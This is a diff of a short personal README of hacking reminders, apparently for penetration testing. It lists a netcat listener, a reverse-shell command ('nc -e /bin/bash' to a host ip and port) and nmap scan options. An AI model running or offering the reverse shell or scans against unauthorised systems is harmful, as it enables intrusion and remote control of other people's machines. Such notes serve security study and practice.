IamIsaSeyfullayev/don-t-forget/README.md

 netcad
-nc -nvlp port for listening ports wich is we wanna use that next type id next ls or pwd nc -e /bin/bash host and port when we enter system
+nc -nvlp port for listening ports wich is we wanna use that next type id next ls or pwd nc -e /bin/bash host ip and port when we enter system
 nmap:
 nmap -sS -A -v -p --min-rate 99999 host nmap -p- -sV port scanning ant its version